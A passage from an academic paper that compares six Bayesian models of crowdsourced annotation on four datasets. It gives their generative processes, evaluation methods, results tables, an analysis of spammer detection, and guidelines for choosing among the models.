et al., 2014; Habernal and Gurevych, 2016, inter alia). Its generative process is: • For every annotator j ∈{1, 2, ...,J}: – Draw spamming behavior �j ∼ Dirichlet(10K ) – Draw credibility θj ∼ Beta(0.5, 0.5) • For every item i ∈{1, 2, ...,I}: – Draw true class ci ∼ Uniform – For every position n ∈{1, 2, ...,Ni}: ∗ Draw a spamming indicator si,n ∼ Bernoulli(1 −θjj[i,n]) ∗ If si,n = 0 then: · yi,n = ci ∗ Else: · yi,n ∼ Categorical(�jj[i,n]) 2.3 Partially Pooled Models Hierarchical Dawid and Skene (HIERD&S) In this model, the fixed priors of Dawid and Skene are replaced with hierarchical priors representing 4Notation: jj[i,n] gives the index of the annotator who produced the n-th annotation on item i. 5That is, propensity to produce labels with malicious intent. Figure 4: Plate diagram for the hierarchical Dawid and Skene model. the overall population of annotators (see Figure 4). This structure provides partial pooling, using in- formation about the population to improve esti- mates of individuals by regularizing toward the population mean. This is particularly helpful with low count data as found in many crowdsourcing tasks (Gelman et al., 2013). The full generative process is as follows:6 • For every class k ∈{1, 2, ...,K}: – Draw class ability means ζk,k′ ∼ Normal(0, 1),∀k′ ∈{1, ...,K} – Draw class s.d.’s Ωk,k′ ∼ HalfNormal(0, 1),∀k′ • For every annotator j ∈{1, 2, ...,J}: – For every class k ∈{1, 2, ...,K}: ∗ Draw class annotator abilities βj,k,k′ ∼ Normal(ζk,k′, Ωk,k′ ),∀k′ • Draw class prevalence π ∼ Dirichlet(1K ) • For every item i ∈{1, 2, ...,I}: – Draw true class ci ∼ Categorical(π) – For every position n ∈{1, 2, ...,Ni}: ∗ Draw annotation yi,n ∼ Categorical(softmax(βjj[i,n],ci)) 7 Item Difficulty (ITEMDIFF) We also test an exten- sion of the “Beta-Binomial by Item” model from Carpenter (2008), which does not assume any an- notator structure; instead, the annotations of an item are made to depend on its intrinsic difficulty. The model further assumes that item difficulties are instances of class-level hierarchical difficulties (see Figure 5). This is another example of a 6A two-class version of this model can be found in Carpenter (2008) under the name “Beta-Binomial by Anno- tator.” 7The argument of the softmax is a K-dimensional vector of annotator abilities given the true class, i.e., βjj[i,n],ci = (βjj[i,n],ci,1, ...,βjj[i,n],ci,K). 573 Figure 5: Plate diagram for the item difficulty model. partially pooled model. Its generative process is presented here: • For every class k ∈{1, 2, ...,K}: – Draw class difficulty means: ηk,k′ ∼ Normal(0, 1),∀k′ ∈{1, ...,K} – Draw class s.d.’s Xk,k′ ∼ HalfNormal(0, 1),∀k′ • Draw class prevalence π ∼ Dirichlet(1K ) • For every item i ∈{1, 2, ...,I}: – Draw true class ci ∼ Categorical(π) – Draw item difficulty θi,k ∼ Normal(ηci,k,Xci,k),∀k – For every position n ∈{1, 2, ...,Ni}: ∗ Draw annotation: yi,n ∼ Categorical(softmax(θi)) Logistic Random Effects (LOGRNDEFF) The last model is the Logistic Random Effects model (Carpenter, 2008), which assumes the annotations depend on both annotator abilities and item dif- ficulties (see Figure 6). Both annotator and item parameters are drawn from hierarchical priors for partial pooling. Its generative process is given as: • For every class k ∈{1, 2, ...,K}: – Draw class ability means ζk,k′ ∼ Normal(0, 1),∀k′ ∈{1, ...,K} – Draw class ability s.d.’s Ωk,k′ ∼ HalfNormal(0, 1),∀k′ – Draw class difficulty s.d.’s Xk,k′ ∼ HalfNormal(0, 1),∀k′ • For every annotator j ∈{1, 2, ...,J}: – For every class k ∈{1, 2, ...,K}: ∗ Draw class annotator abilities βj,k,k′ ∼ Normal(ζk,k′, Ωk,k′ ),∀k′ • Draw class prevalence π ∼ Dirichlet(1K ) Figure 6: Plate diagram for the logistic random effects model. • For every item i ∈{1, 2, ...,I}: – Draw true class ci ∼ Categorical(π) – Draw item difficulty: θi,k ∼ Normal(0,Xci,k),∀k – For every position n ∈{1, 2, ...,Ni}: ∗ Draw annotation yi,n ∼ Categorical(softmax(βjj[i,n],ci−θi)) 3 Implementation of the Models We implemented all models in this paper in Stan (Carpenter et al., 2017), a tool for Bayesian Inference based on Hamiltonian Monte Carlo. Although the non-hierarchical models we present can be fit with (penalized) maximum likeli- hood (Dawid and Skene, 1979; Passonneau and Carpenter, 2014),8 there are several advantages to a Bayesian approach. First and foremost, it pro- vides a mean for measuring predictive calibration for forecasting future results. For a well-specified model that matches the generative process, Bayesian inference provides optimally calibrated inferences (Bernardo and Smith, 2001); for only roughly accurate models, calibration may be mea- sured for model comparison (Gneiting et al., 2007). Calibrated inference is critical for mak- ing optimal decisions, as well as for forecast- ing (Berger, 2013). A second major benefit of Bayesian inference is its flexibility in combining submodels in a computationally tractable manner. For example, predictors or features might be 8Hierarchical models are challenging to fit with classical methods; the standard approach, maximum marginal likeli- hood, requires marginalizing the hierarchical parameters, fit- ting those with an optimizer, then plugging the hierarchical parameter estimates in and repeating the process on the coef- ficients (Efron, 2012). This marginalization requires either a custom approximation per model in terms of either quadra- ture or Markov chain Monte Carlo to compute the nested integral required for the marginal distribution that must be optimized first (Martins et al., 2013). 574 available to allow the simple categorical preva- lence model to be replaced with a multilogistic regression (Raykar et al., 2010), features of the annotators may be used to convert that to a re- gression model, or semi-supervised training might be carried out by adding known gold-standard la- bels (Van Pelt and Sorokin, 2012). Each model can be implemented straightforwardly and fit ex- actly (up to some degree of arithmetic precision) using Markov chain Monte Carlo methods, al- lowing a wide range of models to be evaluated. This is largely because posteriors are much bet- ter behaved than point estimates for hierarchical models, which require custom solutions on a per- model basis for fitting with classical approaches (Rabe-Hesketh and Skrondal, 2008). Both of these benefits make Bayesian inference much simpler and more useful than classical point estimates and standard errors. Convergence is assessed in a standard fash- ion using the approach proposed by Gelman and Rubin (1992): For each model we run four chains with diffuse initializations and verify that they converge to the same mean and variances (using the criterion R̂ < 1.1). Hierarchical priors, when jointly fit with the rest of the parameters, will be as strong and thus sup- port as much pooling as evidenced by the data. For fixed priors on simplexes (probability parameters that must be non-negative and sum to 1.0), we use uniform distributions (i.e., Dirichlet(1K )). For lo- cation and scale parameters, we use weakly infor- mative normal and half-normal priors that inform the scale of the results, but are not otherwise sen- sitive. As with all priors, they trade some bias for variance and stabilize inferences when there is not much data. The exception is MACE, for which we used the originally recommended priors, to con- form with the authors’ motivation. All model implementations are available to readers online at http://dali.eecs. qmul.ac.uk/papers/supplementary_ material.zip. 4 Evaluation The models of annotation discussed in this paper find their application in multiple tasks: to label items, characterize the annotators, or flag espe- cially difficult items. This section lays out the met- rics used in the evaluation of each of these tasks. Dataset I N J K J/I I/J WSD 177 1770 34 3 10 10 10 10 10 10 17 20 20 52 77 177 RTE 800 8000 164 2 10 10 10 10 10 10 20 20 20 49 20 800 TEMP 462 4620 76 2 10 10 10 10 10 10 10 10 16 61 50 462 PD 5892 43161 294 4 1 5 7 7 9 57 1 4 13 147 51 3395 Table 1: General statistics (I items, N observations, J annotators, K classes) together with summary statis- tics for the number of annotators per item (J/I) and the number of items per annotator (I/J) (i.e., Min, 1st Quartile, Median, Mean, 3rd Quartile, and Max). 4.1 Datasets We evaluate on a collection of datasets reflect- ing a variety of use-cases and conditions: binary vs. multi-class classification; small vs. large num- ber of annotators; sparse vs. abundant num- ber of items per annotator / annotators per item; and varying degrees of annotator quality (statis- tics presented in Table 1). Three of the datasets— WSD, RTE, and TEMP, created by Snow et al. (2008)—are widely used in the literature on an- notation models (Carpenter, 2008; Hovy et al., 2013). In addition, we include the Phrase Detec- tives 1.0 (PD) corpus (Chamberlain et al., 2016), which differs in a number of key ways from the Snow et al. (2008) datasets: It has a much larger number of items and annotations, greater sparsity, and a much greater likelihood of spamming due to its collection via a game-with-a-purpose setting. This dataset is also less artificial than the datasets in Snow et al. (2008), which were created with the express purpose of testing crowdsourcing. The data consist of anaphoric annotations, which we reduce to four general classes (DN/DO = discourse new/old, PR = property, and NR = non-referring). To ensure similarity with the Snow et al. (2008) datasets, we also limit the coders to one annotation per item (discarded data were mostly redundant annotations). Furthermore, this corpus allows us to evaluate on meta-data not usually available in traditional crowdsourcing platforms, namely, in- formation about confessed spammers and good, established players. 4.2 Comparison Against a Gold Standard The first model aspect we assess is how accu- rately they identify the correct (“true”) label of the items. The simplest way to do this is by com- paring the inferred labels against a gold standard, 575 http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip using standard metrics such as Precision / Re- call / F-measure, as done, for example, for the evaluation of MACE in Hovy et al. (2013). We check whether the reported differences are statis- tically significant, using bootstrapping (the shift method), a non-parametric two-sided test (Wilbur, 1994; Smucker et al., 2007). We use a signifi- cance threshold of 0.05 and further report whether the significance still holds after applying the Bonferroni correction for type 1 errors. This type of evaluation, however, presupposes that a gold standard can be obtained. This as- sumption has been questioned by studies show- ing the extent of disagreement on annotation even among experts (Poesio and Artstein, 2005; Passonneau and Carpenter, 2014; Plank et al., 2014b). This motivates exploring complementary evaluation methods. 4.3 Predictive Accuracy In the statistical analysis literature, posterior predictions are a standard assessment method for Bayesian models (Gelman et al., 2013). We measure the predictive performance of each model using the log predictive density (lpd), that is, log p(ỹ|y), in a Bayesian K-fold cross-validation setting (Piironen and Vehtari, 2017; Vehtari et al., 2017). The set-up is straightforward: we partition the data into K subsets, each subset formed by splitting the annotations of each annotator into K random folds (we choose K = 5). The splitting strategy ensures that models that cannot handle predictions for new annotators (i.e., unpooled models like D&S and MACE) are nevertheless included in the comparison. Concretely, we compute lpd = K∑ k=1 log p(ỹk|y(−k)) = K∑ k=1 log ∫ p(ỹk,θ|y(−k))dθ ≈ K∑ k=1 log 1 M M∑ m=1 p(ỹk|θ(k,m)) (1) In Equation (1), y(−k) and ỹk represent the items from the train and test data, for iteration k of the cross validation, while θ(k,m) is one draw from the posterior. 4.4 Annotators’ Characterization A key property of most of these models is that they provide a characterization of coder ability. In the D&S model, for instance, each annotator is modeled with a confusion matrix; Passonneau and Carpenter (2014) showed how different types of annotators (biased, spamming, adversarial) can be identified by examining this matrix. The same information is available in HIERD&S and LOGRNDEFF, whereas MACE characterizes coders by their level of credibility and spamming preference. We discuss these parameters with the help of the metadata provided by the PD corpus. Some of the models (e.g., MULTINOM or ITEMDIFF) do not explicitly model annotators. However, an estimate of annotator accuracy can be derived post-inference for all the models. Con- cretely, we define the accuracy of an annotator as the proportion of their annotations that match the inferred item-classes. This follows the cal- culation of gold-annotator accuracy (Hovy et al., 2013), computed with respect to the gold standard. Similar to Hovy et al. (2013), we report the cor- relation between estimated and gold annotators’ accuracy. 4.5 Item Difficulty Finally, the LOGRNDEFF model also provides an estimate that can be used to assess item difficulty. This parameter has an effect on the correctness of the annotators: namely, there is a subtractive relationship between the ability of an annotator and the item-difficulty parameter. The “difficulty” name is thus appropriate, although an examination of this parameter alone does not explicitly mark an item as difficult or easy. The ITEMDIFF model does not model annotators and only uses the diffi- culty parameter, but the name is slightly mislead- ing because its probabilistic role changes in the absence of the other parameter (i.e., it now shows the most likely annotation classes for an item). These observations motivate an independent mea- sure of item difficulty, but there is no agreement on what such a measure could be. One approach is to relate the difficulty of an item to the confidence a model has in assigning it a label. This way, the difficulty of the items is judged under the subjectivity of the models, which in turn is influenced by their set of assumptions and data fitness. As in Hovy et al. (2013), we mea- sure the model’s confidence via entropy to filter out the items the models are least confident in (i.e., the more difficult ones) and report accuracy trends. 576 5 Results This section assesses the six models along dif- ferent dimensions. The results are compared with those obtained with a simple majority vote (MAJVOTE) baseline. We do not compare the re- sults with non-probabilistic baselines as it has already been shown (see, e.g., Quoc Viet Hung et al., 2013) that they underperform compared with a model of annotation. We follow the evaluation tasks and metrics dis- cussed in §4 and briefly summarized next. A core task for which models of annotation are used is to infer the correct interpretations from a crowd- sourced dataset of annotations. This evaluation is conducted first and consists of a comparison against a gold standard. One problem with this as- sessment is caused by ambiguity—previous stud- ies indicating disagreement even among experts. Because obtaining a true gold standard is question- able, we further explore a complementary evalua- tion, assessing the predictive performance of the models, a standard evaluation approach from the literature on Bayesian models. Another core task models of annotation are used for is to character- ize the accuracy of the annotators and their error patterns. This is the third objective of this evalu- ation. Finally, we conclude this section assessing the ability of the models to correctly diagnose the items for which potentially incorrect labels have been inferred. The PD data are too sparse to fit the models with item-level difficulties (i.e., ITEMDIFF and LOGRNDEFF). These models are therefore not present in the evaluations conducted on the PD corpus. 5.1 Comparison Against a Gold Standard A core task models of annotation are used for is to infer the correct interpretations from crowd- annotated datasets. This section compares the inferred interpretations with a gold standard. Tables 2, 3 and 4 present the results.9 On WSD and TEMP datasets (see Table 4), characterized by a small number of items and annotators (statis- tics in Table 1), the different model complexi- ties result in no gains, all the models performing 9The results for MAJVOTE, HIERD&S, and LOGRNDEFF we report match or slightly outperform those reported by Carpenter (2008) on the RTE dataset. Similar for MACE, across WSD, RTE, and TEMP datasets (Hovy et al., 2013). Model Result Statistical Significance MULTINOM 0.89 D&S* HIERD&S* LOGRNDEFF* MACE* D&S 0.92 ITEMDIFF* MAJVOTE MULTINOM* HIERD&S 0.93 ITEMDIFF* MAJVOTE* MULTINOM* ITEMDIFF 0.89 LOGRNDEFF* MACE* D&S* HIERD&S* LOGRNDEFF 0.93 MAJVOTE* MULTINOM* ITEMDIFF* MACE 0.93 MAJVOTE* MULTINOM* ITEMDIFF* MAJVOTE 0.90 D&S HIERD&S* LOGRNDEFF* MACE* Table 2: RTE dataset results against the gold standard. Both micro (accuracy) and macro (P, R, F) scores are the same. * indicates that significance (0.05 threshold) holds after applying the Bonferroni correction. equivalently. Statistically significant differences (0.05 threshold, plus Bonferroni correction for type 1 errors; see §4.2 for details) are, however, very much present in Tables 2 (RTE dataset) and 3 (PD dataset). Here the results are dominated by the unpooled (D&S and MACE) and partially pooled models (LOGRNDEFF, and HIERD&S, except for PD, as discussed later in §6.1), which assume some form of annotator structure. Further- more, modeling the full annotator response matrix leads in general to better results (e.g., D&S vs. MACE on the PD dataset). Ignoring completely any annotator structure is rarely appropriate, such models failing to capture the different levels of expertise the coders have—see the poor perfor- mance of the unpooled MULTINOM model and of the partially pooled ITEMDIFF model. Similarly, the MAJVOTE baseline implicitly assumes equal expertise among coders, leading to poor perfor- mance results. 5.2 Predictive Accuracy Ambiguity causes disagreement even among ex- perts, affecting the reliability of existing gold standards. This section presents a complementary evaluation, namely, predictive accuracy. In a simi- lar spirit to the results obtained in the comparison against the gold standard, modeling the ability of the annotators was also found to be essential for a good predictive performance (results presented 577 Accuracy (micro) F-measure (macro) Model Result Statistical Significance Result Statistical Significance MULTINOM 0.87 D&S* HIERD&S* MACE* MAJVOTE 0.79 D&S* HIERD&S* MACE* MAJVOTE* D&S 0.94 HIERD&S* MACE* MAJVOTE* MULTINOM* 0.87 HIERD&S* MACE* MAJVOTE* MULTINOM* HIERD&S 0.89 MACE* MAJVOTE* MULTINOM* D&S* 0.82 MAJVOTE* MULTINOM* D&S* MACE 0.93 MAJVOTE* MULTINOM* D&S* HIERD&S* 0.83 MAJVOTE* MULTINOM* D&S* MAJVOTE 0.88 MULTINOM D&S* HIERD&S* MACE* 0.73 MULTINOM* D&S* HIERD&S* MACE* Precision (macro) Recall (macro) Model Result Statistical Significance Result Statistical Significance MULTINOM 0.73 D&S* HIERD&S* MACE* MAJVOTE* 0.85 HIERD&S* MAJVOTE* D&S 0.88 HIERD&S* MACE* MULTINOM* 0.87 HIERD&S MACE MAJVOTE* HIERD&S 0.76 MACE* MAJVOTE* MULTINOM* D&S* 0.89 MACE* MAJVOTE* MULTINOM* D&S MACE 0.83 MAJVOTE MULTINOM* D&S* HIERD&S* 0.84 MAJVOTE* D&S HIERD&S* MAJVOTE 0.87 MULTINOM* HIERD&S* MACE 0.63 MULTINOM* D&S* HIERD&S* MACE* Table 3: PD dataset results against the gold standard. * indicates that significance holds after Bonferroni correction. Dataset Model Accµ PM RM FM WSD ITEMDIFF 0.99 0.83 0.99 0.91 LOGRNDEFF Others 0.99 0.89 1.00 0.94 TEMP MAJVOTE 0.94 0.93 0.94 0.94 Others 0.94 0.94 0.94 0.94 Table 4: Results against the gold (µ = Micro; M = Macro). in Table 5). However, in this type of evaluation, the unpooled models can overfit, affecting their performance (e.g., a model of higher complex- ity like D&S, on a small dataset like WSD). The partially pooled models avoid overfitting through the hierarchical structure obtaining the best pre- dictive accuracy. Ignoring the annotator structure (ITEMDIFF and MULTINOM) leads to poor per- formance on all datasets except for WSD, where this assumption is roughly appropriate since all the annotators have a very high proficiency (above 95%). 5.3 Annotators’ Characterization Another core task models of annotation are used for is to characterize the accuracy and bias of the annotators. We first assess the correlation between the esti- mated and gold accuracy of the annotators. The re- sults, presented in Table 6, follow the same pattern to those obtained in §5.1: a better performance of the unpooled (D&S and MACE10) and partially pooled models (LOGRNDEFF and HIERD&S, ex- cept for PD, as discussed later in §6.1). The results 10The results of our reimplementation match the published ones (Hovy et al., 2013). Model WSD RTE TEMP PD* MULTINOM -0.75 -5.93 -5.84 -4.67 D&S -1.19 -4.98 -2.61 -2.99 HIERD&S -0.63 -4.71 -2.62 -3.02 ITEMDIFF -0.75 -5.97 -5.84 - LOGRNDEFF -0.59 -4.79 -2.63 - MACE -0.70 -4.86 -2.65 -3.52 Table 5: The log predictive density results, normalized to a per-item rate (i.e., lpd/I). Larger values indicate a better predictive performance. PD* is a subset of PD such that each annotator has a number of annotations at least as big as the number of folds. are intuitive: A model that is accurate with respect to the gold standard should also obtain high corre- lation at annotator level. The PD corpus also comes with a list of self- confessed spammers and one of good, established players (see Table 7 for a few details). Continuing with the correlation analysis, an inspection of the second-to-last column from Table 6 shows largely accurate results for the list of spammers. On the second category, however, the non-spammers (the last column), we see large differences between models, following the same pattern with the previ- ous correlation results. An inspection of the spam- mers’ annotations show an almost exclusive use of the DN (discourse new) class, which is highly prevalent in PD and easy for the models to infer; the non-spammers, on the other hand, make use of all the classes, making it more difficult to capture their behavior.11 11In a typical coreference corpus, over 60% of mentions are DN; thus, always choosing DN results in a good accuracy level. The one-class preference is a common spamming be- havior (Hovy et al., 2013; Passonneau and Carpenter, 2014). 578 Model WSD RTE TEMP PD S NS MAJVOTE 0.90 0.78 0.91 0.77 0.98 0.65 line MULTINOM 0.90 0.84 0.93 0.75 0.97 0.84 D&S 0.90 0.89 0.92 0.88 1.00 0.99 HIERD&S 0.90 0.90 0.92 0.76 1.00 0.91 ITEMDIFF 0.80 0.84 0.93 - - - LOGRNDEFF 0.80 0.89 0.92 - - - MACE 0.90 0.90 0.92 0.86 1.00 0.98 Table 6: Correlation between gold and estimated accu- racy of annotators. The last two columns refer to the list of known spammers and non-spammers in PD. Type Size Gold accuracy quantiles Spammers 7 0.42 0.55 0.74 Non-spammers 19 0.59 0.89 0.94 Table 7: Statistics on player types. Reported quantiles are 2.5%, 50%, and 97.5%. We further examine some useful parameter estimates for each player type. We chose one spammer and one non-spammer and discuss the confusion matrix inferred by D&S, together with the credibility and spamming preference given by MACE. The two annotators were chosen to be rep- resentative for their type. The selection of the mod- els was guided by their two different approaches to capturing the behavior of the annotators. Table 8 presents the estimates for the annotator selected from the list of spammers. Again, inspec- tion of the confusion matrix shows that, irrespec- tive of the true class, the spammer almost always produces the DN label. The MACE estimates are similar, allocating 0 credibility to this annotator, and full spamming preference for the DN class. In Table 9 we show the estimates for the anno- tator chosen from the non-spammers list. Their response matrix indicates an overall good perfor- mance (see diagonal matrix), albeit with a con- fusion of PR (property) for DN (discourse new), which is not surprising given that indefinite NPs (e.g., a policeman) are the most common type of mention in both classes. MACE allocates large credibility to this annotator and shows a similar spamming preference for the DN class. This discussion, as well as the quantiles from Table 7, show that poor accuracy is not by it- self a good indicator of spamming. A spammer like the one discussed in this section can obtain good performance by always choosing a class with high frequency in the gold standard. At the same time, a non-spammer may fail to recognize some true classes correctly, but be very good on oth- ers. Bayesian models of annotation allow captur- D&S βj NR DN PR DO NR 0.03 0.92 0.03 0.03 DN 0.00 1.00 0.00 0.00 PR 0.01 0.98 0.01 0.01 DO 0.00 1.00 0.00 0.00 MACE �j NR DN PR DO 0.00 0.99 0.00 0.00 θj 0.00 Table 8: Spammer analysis example. D&S provides a confusion matrix; MACE shows the spamming prefer- ence and the credibility. D&S βj NR DN PR DO NR 0.79 0.07 0.07 0.07 DN 0.00 0.96 0.01 0.02 PR 0.03 0.21 0.72 0.04 DO 0.00 0.06 0.00 0.94 MACE �j NR DN PR DO 0.09 0.52 0.17 0.22 θj 0.92 Table 9: A non-spammer analysis example. D&S pro- vides a confusion matrix; MACE shows the spamming preference and the credibility. ing and exploiting these observations. For a model like D&S, such a spammer presents no harm, as their contribution towards any potential true class of the item is the same and therefore cancels out.12 5.4 Filtering Using Model Confidence This section assesses the ability of the models to correctly diagnose the items for which potentially incorrect labels have been inferred. Concretely, we identify the items that the models are least confi- dent in (measured using the entropy of the poste- rior of the true class distribution) and present the accuracy trends as we vary the proportion of fil- tered out items. Overall, the trends (Figures 7, 8 and 9) indicate that filtering out the items with low confidence improves the accuracy of all the models and across all datasets.13 12Point also made by Passonneau and Carpenter (2014). 13The trends for MACE match the published ones. Also, we left out the analysis on the WSD dataset, as the models already obtain 99% accuracy without any filtering (see §5.1). 579 Figure 7: Effect of filtering on RTE: accuracy (y-axis) vs. proportion of data with lowest entropy (x-axis). Figure 8: TEMP dataset: accuracy (y-axis) vs. propor- tion of data with lowest entropy (x-axis). 6 Discussion We found significant differences across a number of dimensions between both the annotation models and between the models and MAJVOTE. 6.1 Observations and Guidelines The completely pooled model (MULTINOM) un- derperforms in almost all types of evaluation and all datasets. Its weakness derives from its core as- sumption: It is rarely appropriate in crowdsourc- ing to assume that all annotators have the same ability. The unpooled models (D&S and MACE) as- sume each annotator has their own response pa- rameter. These models can capture the accuracy and bias of annotators, and perform well in all evaluations against the gold standard. Lower performance is obtained, however, on posterior predictions: The higher complexity of unpooled models results in overfitting, which affects their predictive performance. The partially pooled models (ITEMDIFF, HIERD&S, and LOGRNDEFF) assume both Figure 9: PD dataset: accuracy (y-axis) vs. proportion of data with lowest entropy (x-axis). individual and hierarchical structure (capturing population behavior). These models achieve the best of both worlds, letting the data determine the level of pooling that is required: They asymptote to the unpooled models if there is a lot of variance among the individuals in the population, or to the fully pooled models when the variance is very low. This flexibility ensures good performance both in the evaluations against the gold standard and in terms of their predictive performance. Across the different types of pooling, the mod- els that assume some form of annotator structure (D&S, MACE, LOGRNDEFF, and HIERD&S) came out on top in all evaluations. The unpooled models (D&S and MACE) register on par performance with the partially pooled ones (LOGRNDEFF and HIERD&S, except for the PD dataset, as discussed later in this section) in the evaluations against the gold standard, but as pre- viously mentioned, can overfit, affecting their predictive performance. Ignoring any annotator structure (the pooled MULTINOM model, the par- tially pooled ITEMDIFF model, or the MAJVOTE baseline) leads generally to poor performance results. The approach we took in this paper is domain- independent, that is, we did not assess and com- pare models that use features extracted from the data, even though it is known that when such fea- tures are available, they are likely to help (Raykar et al., 2010; Felt et al., 2015a; Kamar et al., 2015). This is because a proper assessment of such mod- els would also require a careful selection of the features and how to include them into a model of annotation. A bad (i.e., misspecified in the statistical sense) domain model is going to hurt more than help as it will bias the other estimates. Providing guidelines for this feature-based analysis 580 would have excessively expanded the scope of this paper. But feature-based models of annotation are extensions of the standard annotation-only mod- els; thus, this paper can serve as a foundation for the development of such models. A few exam- ples of feature-based extensions of standard mod- els of annotation are given in §7 to guide readers who may want to try them out for their specific task/domain. The domain-independent approach we took in this paper further implies that there are no dif- ferences between applying these models to cor- pus annotation or other crowdsourcing tasks. This paper is focused on resource creation and does not propose to investigate the performance of the models in downstream tasks. However, previous work already used such models of annotation for NLP (Plank et al., 2014a; Sabou et al., 2014; Habernal and Gurevych, 2016, image labeling (Smyth et al., 1995; Kamar et al., 2015), or med- ical (Albert and Dodd, 2004; Raykar et al., 2010) tasks. Although HIERD&S normally achieves the best performance in all evaluations on the Snow et al. (2008) datasets, on the PD data it is outper- formed by the unpooled models (MACE and D&S). To understand this discrepancy, note that the datasets from Snow et al. (2008) were pro- duced using Amazon Mechanical Turk, by mainly highly skilled annotators; whereas the PD dataset was produced in a game-with-a-purpose setting, where most of the annotations were made by only a handful of coders of high quality, the rest be- ing produced by a large number of annotators with much lower abilities. These observations point to a single population of annotators in the former datasets, and to two groups in the latter case. The reason why the unpooled models (MACE and D&S) outperform the partially pooled HIERD&S model on the PD data is that this class of mod- els assumes no population structure—hence, there is no hierarchical influence; a multi-modal hierar- chical prior in HIERD&S might be better suited for the PD data. This further suggests that results depend to some extent on the dataset specifics. This does not alter the general guidelines made in this paper. 6.2 Technical Notes Posterior Curvature. In hierarchical models, a complicated posterior curvature increases the dif- ficulty of the sampling process affecting con- vergence. This may happen when the data are sparse or when there are large inter-group vari- ances. One way to overcome this problem is to use a non-centered parameterization (Betancourt and Girolami 2015). This approach separates the lo- cal parameters from their parents, easing the sam- pling process. This often improves the effective sample size and, ultimately, the convergence (i.e., lower R̂). The non-centered parameterization of- fers an alternative but equivalent implementation of a model. We found this essential to ensure a robust implementation of the partially pooled models. Label Switching. The label switching problem that occurs in mixture models is due to the like- lihood’s invariance under the permutation of the labels. This makes the models nonidentifiable. Convergence cannot be directly assessed, because the chains will no longer overlap. We use a gen- eral solution to this problem from Gelman et al. (2013): re-label the parameters, post-inference, based on a permutation that minimizes some loss function. For this survey, we used a small ran- dom sample of the gold data (e.g., five items per class) to find the permutation that maximizes model accuracy for every chain-fit. We then re- labeled the parameters of each chain according to the chain-specific permutation before combining them for convergence assessment. This ensures model identifiability and gold alignment. 7 Related Work Bayesian models of annotation share many char- acteristics with so called item-response and ideal- point models. A popular application of these models is to analyze data associated with indi- viduals and test items. A classic example is the Rasch model (Rasch, 1993) which assumes that the probability of a person being correct on a test item is based on a subtractive relationship be- tween their ability and the difficulty of the item. The model takes a supervised approach to jointly estimating the ability of the individuals and the difficulty of the test items based on the correct- ness of their responses. The models of annota- tion we discussed in this paper are completely unsupervised and infer, in addition to annotator ability and/or item difficulty, the correct labels. More details on item-response models are given in Skrondal and Rabe-Hesketh (2004) and Gelman 581 and Hill (2007). Item-response theory has also been recently applied to NLP applications (Lalor et al., 2016; Martınez-Plumed et al., 2016; Lalor et al., 2017). The models considered so far take into account only the annotations. There is work, however, that further exploits the features that can accompany items. A popular example is the model introduced by Raykar et al. (2010), where the true class of an item is made to depend both on the annotations and on a logistic regression model that are jointly fit; essentially, the logistic regression replaces the simple categorical model of prevalence. Felt et al. (2014, 2015b) introduced similar models that also modeled the predictors (features) and compared them to other approaches (Felt et al., 2015a). Kamar et al. (2015) account for task-specific fea- ture effects on the annotations. In §6.2, we discussed the label switching prob- lem (Stephens, 2000) that many models of an- notation suffer from. Other solutions proposed in the literature include utilizing class-informative priors, imposing ordering constraints (obvious for univariate parameters; less so in multivariate cases) (Gelman et al., 2013), or applying different post-inference relabeling techniques (Felt et al., 2014). 8 Conclusions This study aims to promote the use of Bayesian models of annotation by the NLP community. These models offer substantial advantages over both agreement statistics (used to judge coding standards), and over majority-voting aggregation to generate gold standards (even when used with heuristic censoring or adjudication). To provide assistance in this direction, we compare six existing models of annotation with distinct prior and likelihood structures (e.g., pooled, unpooled, and partially pooled) and a diverse set of effects (annotator ability, item difficulty, or a subtractive relationship between the two). We use various evaluation settings on four datasets, with different levels of sparsity and annotator accuracy, and report significant differences both among the models, and between models and majority voting. As importantly, we provide guidelines to both aid users in the selection of the models and to raise awareness of the technical aspects essential to their implementation. We release all models evaluated here as Stan implementations at http://dali.eecs.qmul.ac.uk/paper/ supplementary_material.zip. Acknowledgments Paun, Chamberlain, and Poesio are supported by the DALI project, funded by ERC. Carpenter is partly supported by the U.S. National Science Foundation and the U.S. Office of Naval Research. References Paul S. Albert and Lori E. Dodd. 2004. A caution- ary note on the robustness of latent class models for estimating diagnostic error without a gold standard. Biometrics, 60(2):427–435. Ron Artstein and Massimo Poesio. 2008. Inter- coder agreement for computational linguistics. Computational Linguistics, 34(4):555–596. James O. Berger. 2013. Statistical Decision The- ory and Bayesian Analysis. Springer. José M. Bernardo and Adrian F. M. Smith. 2001. Bayesian Theory. IOP Publishing. Michael Betancourt and Mark Girolami. 2015. Hamiltonian Monte Carlo for hierarchical mod- els. Current trends in Bayesian methodology with applications, 79:30. Bob Carpenter. 2008. Multilevel Bayesian mod- els of categorical data annotation. Unpublished manuscript. Bob Carpenter, Andrew Gelman, Matt Hoffman, Daniel Lee, Ben Goodrich, Michael Betancourt, Michael A. Brubaker, Jiqiang Guo, Peter Li, and Allen Riddell. 2017. Stan: A probabilistic programming language. Journal of Statistical Software, 76(1):1–32. Jon Chamberlain, Massimo Poesio, and Udo Kruschwitz. 2016. Phrase Detectives corpus 1.0: Crowdsourced anaphoric coreference. In Pro- ceedings of the International Conference on Language Resources and Evaluation (LREC 2016), Portoroz, Slovenia. Alexander Philip Dawid and Allan M. Skene. 1979. Maximum likelihood estimation of ob- server error-rates using the EM algorithm. Ap- plied Statistics, 28(1):20–28. 582 http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip https://doi.org/10.1111/j.0006-341X.2004.00187.x https://doi.org/10.1111/j.0006-341X.2004.00187.x https://doi.org/10.1111/j.0006-341X.2004.00187.x https://doi.org/10.1111/j.0006-341X.2004.00187.x https://lingpipe.files.wordpress.com/2008/11/carp-bayesian-multilevel-annotation.pdf https://lingpipe.files.wordpress.com/2008/11/carp-bayesian-multilevel-annotation.pdf https://doi.org/10.18637/jss.v076.i01 https://doi.org/10.18637/jss.v076.i01 Bradley Efron. 2012. Large-Scale Inference: Em- pirical Bayes Methods for Estimation, Testing, and Prediction, volume 1. Cambridge Univer- sity Press. Alvan R. Feinstein and Domenic V. Cicchetti. 1990. High agreement but low kappa: I. The problems of two paradoxes. Journal of clinical epidemiology, 43(6):543–549. Paul Felt, Kevin Black, Eric Ringger, Kevin Seppi, and Robbie Haertel. 2015a. Early 